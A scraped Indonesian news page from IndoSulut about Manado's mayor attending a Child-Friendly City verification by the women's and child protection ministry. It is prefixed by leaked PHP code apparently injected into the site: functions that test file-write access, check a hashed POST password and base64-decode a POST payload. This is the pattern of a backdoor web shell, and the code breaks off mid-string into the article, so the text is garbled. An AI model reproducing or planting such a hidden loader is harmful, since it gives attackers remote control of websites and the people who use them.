function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Walikota AA Hadiri Kegiatan Verifikasi Lapangan Secara Hybrid oleh Kementrian PPPA RI - IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 10 Jun 2022 10:03 WIB ·

Walikota AA Hadiri Kegiatan Verifikasi Lapangan Secara Hybrid oleh Kementrian PPPA RI


					Walikota AA Hadiri Kegiatan Verifikasi Lapangan Secara Hybrid oleh Kementrian PPPA RI Perbesar

INDOSULUT,MANADO – Wali Kota Manado Andrei Angouw didampingi ketua tim Penggerak PKK Kota Manado Irene Golda Angouw Pinontoan menghadiri kegiatan yang bertajuk “verifikasi lapangan secara hybrid” di aula serbaguna Kantor Wali Kota Manado.

Kegiatan ini dalam kaitan Kota Manado masuk dalam nominasi 9 Kabupaten/Kota se Sulut untuk penilaian Kota Layak Anak tahun 2022 yang dilaksanakan oleh Kementerian Pemberdayaan Perempuan dan Perlindungan Anak Republik Indonesia.

Verifikasi Lapangan Secara Hybrid untuk Kota Manado yang dilaksanakan hari ini sesuai jadwal yang dikeluarkan oleh Kementerian Pemberdayaan Perempuan dan Anak Republik Indonesia.

Acara berlangsung secara virtual bersama Kementerian P3A khususnya Asisten Deputi Kementerian dalam mengikuti verifikasi ini yang juga diikuti Dinas P3A Kota Manado

Wali Kota Manado ketika diminta memberikan sambutan bahwa akan berkomitmen dalam rangka menjadi Kota Layak Anak. Bagi Wali Kota, Layak Anak untuk Kota Manado akan selalu diperjuangkan dengan memperhatikan keberadaan anak-anak. Bahkan untuk hal ini sudah di dukung oleh adanya Perda Layak Anak di Kota Manado. Bagi Wali Kota pelaksanaan berbagai program pemerintah kota Manado diperuntukkan bagi anak-anak sebagai kesinambungan pelaksanaan pembangunan kedepan.

Wali Kota menguraikan, bahwa anak-anak juga akan diperhatikan lewat kebijakan fasilitas umum khususnya fasilitas anak seperti tempat rekreasi anak. Juga gizi yang baik, pendidikan dan kesehatan untuk anak di Kota Manado yang semuanya akan diprioritaskan.

Sementara itu Ketua Tim Penggerak PKK Kota Manado Ibu Irene Golda Angouw Pinontoan ketika diberikan kesempatan untuk memberikan pendapat dan tanggapan terhadap Verifikasi Lapangan Secara Hybrid ini menyampaikan bahwa akan berkomitmen mendukung Pelaksanaan Kota Manado sebagai Kota Layak Anak.

Ketua TP PKK Kota Manado sangat mendukung Kota Manado menjadi kota layak anak lewat berbagai program dan kegiatan dalam meningkatkan kualitas anak dalam keluarga. Bagi Ibu Iren, Hak hak anak juga menjadi perhatian penting TP PKK kota Manado dan berjuang dengan sungguh-sungguh untuk memastikan anak anak mendapatkan hak mereka.

Bahkan Ibu Iren mempertegas bahwa lewat semua anggota PKK yang tersebar di tingkatan Kota, Kecamatan dan Kelurahan sampai dengan dasawisma akan aktif melakukan sosialisasi dan koordinasi dengan jajaran pengurus untuk pencegahan kekerasan terhadap anak.

Dalam verifikasi ini, Dinas P3A Kota Manado ikut melengkapi berbagai informasi yang sudah dan sedang dilakukan sehubungan dengan masuknya Kota Manado dalam nominasi Kota Layak Anak.

Hadir dalam Kegiatan ini selain Ketua Tim Penggerak PKK Kota Manado Ibu Irene Golda Angouw Pinontoan, juga Sekretaris Pemerintah Kota Manado Bpk. Dr. Micler C.S. Lakat S.H.,M.H, Asisten I Bpk. Heri Saptono, Kadis Pemberdayaan Perempuan dan Perlindungan Anak Kota Manado Ibu Dra. Lenda Pelealu, para pejabat dan staf teknis Dinas P3A Kota Manado.(team)

Artikel ini telah dibaca 7 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO